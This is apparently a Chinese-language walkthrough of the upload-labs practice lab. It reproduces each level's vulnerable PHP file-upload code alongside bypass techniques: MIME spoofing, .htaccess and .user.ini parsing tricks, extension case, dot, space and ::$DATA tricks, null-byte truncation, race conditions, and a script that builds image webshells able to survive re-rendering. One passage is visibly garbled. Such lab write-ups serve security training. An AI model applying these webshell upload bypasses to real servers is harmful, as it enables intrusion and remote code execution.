upload-labs-master 关卡分析
pass-1(前端验证)
原理:触发上传后会返回到checkFile()函数进行图片不合法检测,checkFile()函数在js代码中,即客户端使用js对不合法图片进行检查。
绕过方式:
1-直接禁用浏览器js功能,然后上传shell脚本即可。
2-上传正常的文件后缀名,上传,然后抓包,改包,改为需要的后缀名。
上传成功
复制图像链接
http://127.0.0.1/upload-labs-master/upload/pass1.php
pass-2(白名单 MIME)
上传pass2.php,抓包,
把content-Type:application/octet-stream
改为白名单允许的类型即可
image/jpeg image/png image/gif
放包,上传成功
复制图像链接
http://127.0.0.1/upload-labs-master/upload/pass2.php
pass-3(黑名单 特殊解析后缀)
<?php
include '../config.php';
include '../common.php';
include '../head.php';
include '../menu.php';
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);//移除文件两端的空白符
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');//返回从点往后的字符串 .xxxx yei
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
?>
相关函数知识
PHP trim() 函数
trim() 函数移除字符串两侧的空白字符或其他预定义字符。
trim(string,charlist)
string | 必需。规定要检查的字符串。 |
---|---|
charlist | 可选。规定从字符串中删除哪些字符。如果被省略,则移除以下所有字符:"\0" - NULL “\t” - 制表符 “\n” - 换行 “\x0B” - 垂直制表符 “\r” - 回车 " " - 空格 |
相关函数
ltrim() - 移除字符串左侧的空白字符或其他预定义字符
rtrim() - 移除字符串右侧的空白字符或其他预定义字符
PHP strrchr() 函数
strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符
PHP str_ireplace() 函数
str_ireplace() 函数替换字符串中的一些字符(不区分大小写)
str_ireplace(find,replace,string,count)
find | 必需。规定要查找的值。 |
---|---|
replace | 必需。规定替换 find 中的值的值。 |
string | 必需。规定被搜索的字符串。 |
count | 可选。一个变量,对替换数进行计数 |
str_ireplace(“WORLD”,“Shanghai”,“Hello world!”);
结果为:Hello Shanghai
不允许上传后缀为asp aspx php jsp 的文件。
可以利用 appache的特性
php php3 php5 phtml 都会当做php解析执行
上传pass3.php3
复制图片链接
http://127.0.0.1/upload-labs-master/upload/202203051325018349.php3
文件名变了,是因为有重命名
访问
pass-4(.htaccess解析)
仅存在于Apache中
.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:
网页301重定向、
自定义404错误页面、
改变文件扩展名、
允许/阻止特定的用户或者目录的访问、
禁止目录列表、
配置默认文档等功能。
需要的一些配置
1.要打开mod_rewrite模块
phpstudy软件界面——>其他选项菜单——PHP扩展及设置——Apache扩展——rewrite_module模块
2.AllowOverride All。
其他选项菜单——打开配置文件——httpd.conf 文件
搜索查找AllowOverride None,然后把AllowOverride None修改为 AllowOverride All,完成后保存
创建.htaccess文件
<FilesMatch "pass4">
Sethandler application/x-httpd-php
</FilesMatch >
服务器会把文件名包含pass4的文件 当做php解析执行
pass4.jpg 内容
pass4.jpg
pass456.jpg
pass-5(.user.ini配置文件解析控制)
查看源码
is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
把所有可以解析的后缀名都给写死了,包括大小写转换,空格,还有点号,::$DATA
正常的php类文件上传不了了,并且拒绝上传 .htaccess 文件。
.user.ini。它比.htaccess 用的更广,不管服务器是 nginx/apache/IIS,当使用 CGI/
FastCGI 来解析 php 时,php 会优先搜索目录下所有的.ini 文件,并应用其中的配置。
类似于 apache 的.htaccess,但语法与.htacces 不同,语法跟 php.ini 一致。
创建.user.ini 文件
auto_prepend_file=pass5.jpg
把pass5.jpg当做php解析
pass5.jpg实际内容
<?php
echo 'good luck';
phpinfo();
?>
先上传.user.ini 文件
再上传pass5.jpg
.user.ini 文件作用:所有的 php 文件都自动包含 pass5.jpg 文件。.user.ini 相当于一个用
户自定义的 php.ini。
其他:使用大小写绕过.htaccess . . 点空点进行绕过
pass-6(大小写绕过)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
对于文件名后缀的校验时,没有进行通用的大小转换后的校验-
strtolower()
大小写绕过原理:
Windows 系统下,对于文件名中的大小写不敏感。例如:test.php 和 TeSt.PHP 是一
样的。
Linux 系统下,对于文件名中的大小写敏感。例如:test.php 和 TesT.php 就是不一样
的。
绕过方法:文件后缀为.PHP即可
http://127.0.0.1/upload-labs-master/upload/202203051559117765.PHP
Pass-07(空格绕过)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
对上传的文件名未做去空格的操作-> trim()
Windows 系统下,对于文件名中空格会被作为空处理,程序中的检测代码却不能自动删除空格。从而绕过黑名单。
绕过方法:burp 抓包,修改对应的文件名 添加空格。即可
http://127.0.0.1/upload-labs-master/upload/202203051604535072.php
Pass-08 (点号绕过)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
代码未对对上传的文件后缀名未做去点 . 的操作 -> strrchr($file_name, ‘.’)
利用 Windows 系统下,文件后缀名最后一个点会被自动去除。
绕过方法:文件后缀名为 .php.
http://127.0.0.1/upload-labs-master/upload/pass8.php.
Pass-09(::$DATA 绕过)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
未对上传的文件后缀名为做去 :: D A T A 处 理 ∗ ∗ W i n d o w s 系 统 下 , 如 果 文 件 名 + " : : DATA 处理 **Windows 系统下,如果文件名+":: DATA处理∗∗Windows系统下,如果文件名+"::DATA"会把:: D A T A 之 后 的 数 据 当 成 文 件 流 处 理 , 不 会 检 测 后 缀 名 , 且 保 持 : : DATA之后的数据当成文件流处理,不会检测后缀名,且保持:: DATA之后的数据当成文件流处理,不会检测后缀名,且保持::DATA之前的文件名,他的目的就是不检查后缀名**
例如:"phpinfo.php::$DATA"
Windows会自动去掉末尾的::$DATA变成"phpinfo.php
其中内容和所上传文件内容相同,并被解析。
绕过方法:上传带有一句话木马的文件,其文件名为pass9.php::$DATA
http://127.0.0.1/upload-labs-master/upload/202203051608257361.php::$data
http://127.0.0.1/upload-labs-master/upload/202203051608257361.php
pass-10(拼接绕过)
点空点绕过
pass10.php. .
$file_name = deldot($file_name);//删除文件名末尾的点 pass10.php.空格
$file_ext = strrchr($file_name, '.'); //.php.空格
$file_ext = strtolower($file_ext); //转换为小写 .php.空格
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA .php.空格
$file_ext = trim($file_ext); //首尾去空 .php.
http://127.0.0.1/upload-labs-master/upload/pass10.php.
pass11(双写绕过)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
利用 str_ireplace()将文件名中符合黑名单的字符串替换成空,只过滤了一次,存在漏洞
绕过方式:利用双写黑名单字符,对字符串的一次过滤后拼接出 php,文件
名 .pphphp
http://127.0.0.1/upload-labs-master/upload/pass11.php
pass12(白名单 GET 型 0x00 截断)
使用白名单限制上传文件类型,但上传文件的存放路径可控,存在漏洞
产生条件:
需要 php 的版本号低于 5.3.29,且 magic_quotes_gpc 为关闭状态
(打开php的配置文件php-ini,将magic_quotes_gpc设置为Off)
绕过方法:设置上传路径为 upload/phpinfo.php%00 ,添加 phpinfo.php%00 内
容为了控制路径,上传文件后缀为白名单即可 例:test.jpg,保存后为
/upload/phpinfo.php%00test.jpg,但服务端读取到%00 时会自动结束,将文件
内容保存至 phpinfo.php 中
http://127.0.0.1/upload-labs-master/upload/pass12.php%EF%BF%BD/6720220305165151.jpg
http://127.0.0.1/upload-labs-master/upload/pass12.php
pass13(白名单 POST 型 0x00 截断)
源码
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
提交方式为POST
GET会自动解码
空格 ---->url 编码 %00
%00 ---->url 编码 %00
POST不会自动解码
%00 ---->url 编码 %25%30%30
因为 POST 不会像 GET 那样对%00 进行自动解码,
需要手动对进行编码
或者在 16 进制中修改
http://127.0.0.1/upload-labs-master/upload/pass13.php%EF%BF%BD/9120220305171015.jpg
http://127.0.0.1/upload-labs-master/upload/pass13.php
Pass-14 文件内容检测(文件头校验)
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
通过读文件的前 2 个字节,检测上传文件二进制的头信息,判断文
件类型,利用图片马绕过检测。
http://127.0.0.1/upload-labs-master/upload/4320220306155633.gif
需要使用到文件包含,传个参数 file=upload/4320220306155633.gif 即可
4320220306155633.gif 会被当做php执行
Pass-15 文件内容检测 (getimagesize()校验)
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
通过 getimagesize() 获取上传文件信息,图片马绕过
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组
与Pass-14类似,也是对文件开头做检查,只不过是换了一个函数
方法同14关一样
Pass-16 文件内容检测 (exif_imagetype()绕过)
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
利用 php 内置函数 exif_imagetype()获取图片类型(需要开启
php_exif 模块)
Pass-14 15 16 都是对文件开头的标识进行判断,是否为gif jpg png图片,绕过方法一致
Pass-17 文件内容检测(二次渲染)
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
综合判断了后缀名、content-type,以及利用 imagecreatefromgif/png/jpg 函数该函数调用了PHP GD库(GD库,是php处理图形的扩展库)如果上传图片马,里面的一句话会被清除,之前的方法就用不了了
因此需要制作一张二次渲染过后,一句话依旧存在的图片马。
制作一张二次渲染过后,恶意代码依旧存在的png图片马
国外大牛写的脚本,直接拿来运行即可.
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./17.png');
?>
然后再上传
http://127.0.0.1/upload-labs-master/upload/9401.png
依然用到文件包含
upload-labs之pass 16详细分析 - 先知社区 (aliyun.com)
Pass-18 逻辑漏洞(条件竞争)
<?php
include '../config.php';
include '../head.php';
include '../menu.php';
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
?>
先将文件上传到服务器,然后通过 rename 修改名称,再通过
unlink 删除文件,因此可以通过条件竞争的方式在 unlink 之前,访问 webshell。
使用 burp 或者 python 脚本对要上传的文件路径进行不断的访问
(upload/webshell.php),上传一个 webshell.php,但访问该文件,会在目录下生成一个 webshell,文件内容为:
?>
ps:不断上传文件,然后去访问 或者 不断访问,然后去上传文件
使用bp 设置 一个不停上传,一个不停访问
可以用蚁剑连接,密码是cmd
Pass-19 逻辑漏洞(条件竞争-图片马)
后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否
存在等等,将文件上传后,对文件重新命名,同样存在条件竞争的漏洞。
可以不断利用 burp 发送上传图片马的数据包,由于条件竞争,程序会出现来不及rename 的问题,从而上传成功
利用方法:区别于 Pass-18,这里需要使用图片马
Pass-20 逻辑漏洞(小数点绕过)
源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
使用 pathinfo($file_name,PATHINFO_EXTENSION) 的方式检查文件名后缀(从最后一个小数点进行截取),并使用的是黑名单方式。
方法一:上传一句话木马,在文件名后缀加一个小数点绕过 pass20.php. ,上传成功可以直接访问 pass20.php
文件夹名实现绕过,在命名的时候,.php/ .会被操作系统还原为.php
Pass-21 逻辑漏洞(数组接收+目录命名 数组绕过)
对参数$file 进行判断,如果不是,将其修改为数组,但我们提前传入数组时,造成漏洞
那么我们可以通过修改数组中的变量来伪造
reset() 函数将内部指针指向数组中的第一个元素,并输出 pass21.php
伪造的数组有两个值,count($file)-1=2-1=1
$file[1]=’’ 空
save_name[0]=‘pass21.php’
save_name[1]=’’
save_name[2]=‘jpg’
所以file={‘pass21.php’,’’,‘jpg’}
经过源码中的拼接pass21.php.
访问